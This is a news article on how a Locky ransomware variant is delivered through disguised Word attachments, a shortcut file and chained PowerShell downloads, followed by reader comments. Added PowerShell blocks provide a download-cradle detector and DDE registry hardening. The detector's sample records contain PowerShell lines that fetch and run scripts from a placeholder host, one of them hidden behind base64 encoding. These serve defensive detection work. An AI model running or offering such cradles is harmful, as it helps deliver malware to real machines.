Dark Reading is part of the Informa Tech Division of Informa PLC



03:10 PM

New Locky Ransomware Takes Another Turn

A newly identified Locky ransomware campaign is masquerading as legitimate Microsoft Word documents.

Another evolution of Locky ransomware is spreading through malicious attachments disguised as legitimate documents from productivity applications such as Microsoft Word and LibreOffice.

Researchers at Avira Virus Lab detected the ransomware earlier this week. This form of Locky appends the same ".asasin" extension as a strain PhishMe picked up in October. However, it is crafted to manipulate users with a supposedly "protected document" that looks like this:

(Image: Avira)


Double-clicking the image triggers a chain of actions that ends with the user's files encrypted and renamed with the ".asasin" extension. Several other files containing payment instructions are written to disk.

Behind the image in the Word document, researchers found an LNK file, otherwise known as a Windows shortcut. The shortcut runs a PowerShell script, which downloads a second PowerShell script from an embedded URL and runs it.

The second script connects to the Internet and downloads a Windows executable file, which includes several stages of code obfuscation and misleading data to trick victims and analysts into thinking the file is clean and from a legitimate Microsoft application.

Once it's on the victim's machine, the malware collects information about the operating system and sends it, encrypted, to the command-and-control server and retrieves the encryption key.
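The delivery chain above (shortcut launches PowerShell, PowerShell fetches and runs a second script, the second script fetches an executable) leaves a recognisable trace in process-creation telemetry. The following PowerShell function is an added example, not code from the article or from Avira: it scores a process-creation record (for instance a Sysmon Event ID 1 or a 4688 event with command-line auditing) for a download cradle. It decodes an -EncodedCommand payload so the hidden stage is matched too, and treats fetching remote content as suspicious only when combined with a sign of evasion or an Office parent process, so a plain Invoke-WebRequest from an admin console is not flagged. The field names, hostnames and sample command lines are constructed for the example.

```powershell
# Added example (not from the article or Avira): score a process-creation
# record for the PowerShell download-cradle pattern used in this delivery chain.
function Test-PowerShellCradle {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        [string]$ParentImage = ''
    )
    $indicators = New-Object System.Collections.Generic.List[string]
    $decoded = ''

    # -EncodedCommand/-enc/-e carries base64 of a UTF-16LE script; decode it so
    # the same patterns can be matched against the hidden payload.
    if ($CommandLine -match '(?i)-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        $indicators.Add('EncodedCommand')
        try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { $indicators.Add('EncodedCommand:undecodable') }
    }
    $text = "$CommandLine`n$decoded"

    $patterns = [ordered]@{
        DownloadCradle   = '(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer'
        InvokeExpression = '(?i)\bIEX\b|Invoke-Expression'
        HiddenWindow     = '(?i)-w(indowstyle)?\s+hidden'
        NoProfile        = '(?i)-nop\b|-noprofile\b'
        BypassPolicy     = '(?i)-ep\s+bypass|-executionpolicy\s+bypass'
        DropToUserDir    = '(?i)\$env:temp|%temp%|\\AppData\\'
    }
    foreach ($name in $patterns.Keys) {
        if ($text -match $patterns[$name]) { $indicators.Add($name) }
    }
    # An Office application spawning PowerShell is a strong signal for this path.
    # explorer.exe is deliberately not listed: it is the parent of everything a
    # user double-clicks and carries no signal on its own.
    if ($ParentImage -match '(?i)\\(WINWORD|EXCEL|POWERPNT|OUTLOOK|soffice)\.exe$') { $indicators.Add('OfficeParent') }

    # Verdict: remote fetch plus at least one evasion/context indicator.
    $evasion = @('EncodedCommand', 'InvokeExpression', 'HiddenWindow', 'BypassPolicy', 'OfficeParent' |
        Where-Object { $indicators.Contains($_) })
    [pscustomobject]@{
        Suspicious  = [bool]($indicators.Contains('DownloadCradle') -and $evasion.Count -gt 0)
        Indicators  = ($indicators -join ',')
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

# Constructed sample records (not real telemetry). The second is the same cradle
# hidden behind -EncodedCommand, built here so that it decodes correctly.
$stage2  = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage2))
$records = @(
    @{ ParentImage = 'C:\Program Files\Microsoft Office\Office16\WINWORD.EXE'
       CommandLine = 'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/s1.ps1'')"' }
    @{ ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = "powershell.exe -w hidden -enc $encoded" }
    @{ ParentImage = 'C:\Windows\System32\svchost.exe'
       CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1' }
    @{ ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'powershell.exe -c "Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\Temp\tool.zip"' }
)
$records | ForEach-Object { Test-PowerShellCradle -CommandLine $_.CommandLine -ParentImage $_.ParentImage } |
    Format-Table Suspicious, Indicators, CommandLine -AutoSize
```

The first two records are flagged (Office parent or hidden window plus a decoded IEX download cradle); the scheduled backup script and the interactive file download are not, because neither combines a remote fetch with an evasion indicator. In production the records would come from Get-WinEvent rather than an inline array, and the Decoded field is worth keeping in the alert so an analyst sees the second-stage URL without re-decoding it.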

"We are seeing a rapid evolution in the way Locky is delivered," says Brendan Griffin, threat intelligence manager and malware analyst at PhishMe. "Locky stays the same, but the delivery techniques is where we've really seen the most change."

Evolution of Locky: What does it mean?

Ransomware is a growing problem for many organizations, and Locky is a common attack to watch.

"Locky has been one of the most popular malware libraries for a long time," says John Pironti, president of IP Architects. "It has been maturing, and that doesn't surprise me because it has been successful in financial gain."

It's common to see adversaries refresh and renew old approaches to see which is most effective, he continues. Attackers will slightly change their links or scripting to initiate activities to get to the same payload. The idea is to avoid detection and trick more users.

It's "misleading" to call this recent finding a new strain of Locky, Griffin adds. The ".asasin" variant, which PhishMe also detected, uses a more robust and more verbose scripted delivery than earlier Locky campaigns. It collects basic information from the machine, nothing personally identifiable. This is the same malware arriving on a different path.

"We've seen people embed scripts inside of Word documents, Excel links, things like that as a way to generate code and scripts that can grab more malware packages," Pironti says. People are more likely to open an attachment, the vector in Avira's finding, than they are to click a link.

"We spend so much time telling people not to click links … and not nearly as much time telling them not to click attachments," Pironti adds. Many employees click attachments all day as part of their jobs; to them, Word or Excel files aren't as suspicious as a potentially phishy link.

He notes that the ".asasin" extension is amusing. "They want to work off fear and force people to pay," he says.

This evolution also underscores how attackers often revert to simple techniques, Griffin adds. They're taking advantage of the fact that phishing emails, while basic, work. "Why would they choose a really complex, sophisticated, unreliable means of delivering malware?" he says.

Defending against fake applications

Griffin points out that this is a clear example of abuse of Microsoft's Dynamic Data Exchange (DDE), a protocol on which Microsoft has just published guidance for users.

Earlier this week, Microsoft published an advisory, following activity by Fancy Bear, which abused DDE fields to distribute malware. Microsoft is not planning to issue a patch but has provided steps for administrators to disable DDE, a protocol for transferring data between applications. If exploited, an attacker could assume control of an affected system.

Admins can turn off DDE by creating and setting registry entries for Microsoft Office based on the applications installed on the system. After this, data will no longer update automatically between applications, which could be problematic for people who rely on data feeds to update Excel. Microsoft warns doing this incorrectly could cause serious problems that would require reinstallation of the operating system.
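The per-user registry values Microsoft's advisory describes can be applied consistently across the installed Office versions with the following PowerShell function. It is an added example, not code from the article or from Microsoft: the value names and data (DontUpdateLinks = 1 for Word and for Outlook's Word-based editor, WorkbookLinkWarnings = 2 for Excel) are the ones in Microsoft Security Advisory 4053440; the function name, its output format and the version list are this example's own choices. It only touches Office versions actually present under HKCU and supports -WhatIf so the change can be previewed first. Two caveats a practitioner would want: these values stop Office from auto-updating DDE links, and do nothing against an embedded shortcut object that a user double-clicks, which is the path Avira describes above; and because the keys live under HKCU they must be applied per user, so fleet deployment belongs in Group Policy Preferences rather than an interactive run.

```powershell
# Added example (not from the article or Microsoft): apply the per-user registry
# values from Microsoft Security Advisory 4053440 that stop Word, Outlook and
# Excel from auto-updating DDE links. Run as the affected user; use -WhatIf to preview.
function Set-OfficeDdeHardening {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        # Office major versions to check (2010, 2013, 2016/2019/365); only those
        # present under HKCU are touched.
        [string[]]$Version = @('14.0', '15.0', '16.0')
    )
    # Outlook uses Word as its mail editor, hence the WordMail subkey.
    $settings = @(
        @{ App = 'Word';    Path = 'Word\Options';          Name = 'DontUpdateLinks';      Data = 1 }
        @{ App = 'Outlook'; Path = 'Word\Options\WordMail'; Name = 'DontUpdateLinks';      Data = 1 }
        @{ App = 'Excel';   Path = 'Excel\Security';        Name = 'WorkbookLinkWarnings'; Data = 2 }
    )
    foreach ($v in $Version) {
        $root = "HKCU:\Software\Microsoft\Office\$v"
        if (-not (Test-Path $root)) { continue }   # this Office version is not installed for this user
        foreach ($s in $settings) {
            $key = Join-Path $root $s.Path
            # Current state; $null means the weak default (links update automatically / with a prompt).
            $current = (Get-ItemProperty -Path $key -Name $s.Name -ErrorAction SilentlyContinue).($s.Name)
            $changed = $false
            if ($current -ne $s.Data) {
                if ($PSCmdlet.ShouldProcess("$key\$($s.Name)", "set DWORD to $($s.Data)")) {
                    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
                    New-ItemProperty -Path $key -Name $s.Name -PropertyType DWord -Value $s.Data -Force | Out-Null
                    $changed = $true
                }
            }
            [pscustomobject]@{
                Version = $v; App = $s.App; Value = $s.Name
                Before  = $current; After = $s.Data; Changed = $changed
            }
        }
    }
}

Set-OfficeDdeHardening -WhatIf                 # preview which values would change
Set-OfficeDdeHardening | Format-Table -AutoSize # apply and report before/after state
```

The Before column makes the audit half of the job easy: a row with Before empty or 0 is a user who was still on the weak default. Users who depend on linked Excel data feeds will see the link-update prompt stop, as the article notes, so communicate the change before rolling it out.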


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ...

11/13/2017 | 8:52:08 AM
Possible Improvised Solution
  • At my company we supported 200 clients' IT infrastructure. Well, at least 1 client a week was getting infected with Locky; luckily we had backups in each case. However, it was still concerning that Locky was slipping past the security controls in place. So we developed a "programmatic block" which prevents any files from writing to the AppData folder.
  • So, we figured out that for most strains of Locky they will write to the AppData folder for install by default. So we just prevent anything from writing to this folder. It has created a few issues, but we ironed those out. It has been working for the clients for a year now. No new infections since it was implemented.
11/11/2017 | 9:28:51 AM
Locky Ransomware attacks
This attack is of a very dangerous kind. If your files are locked by Locky then you have lost your data and there is no way to recover them; the only option is if you have a backup of your data, then OK.

I faced this situation three times and found that if it enters your network then the only option is to identify the system and remove it immediately from the network, else your network PCs' data is going into the dustbin. Sometimes it also encrypts video and audio files, but which file formats are affected depends on the program.

The best way is to use your network safely with proper antivirus and not install unnecessary programs and adware which have loopholes in their design architecture. If you are a tech giant and want to face such a problem then you can try Locky..... GOOD luck and happy reading.

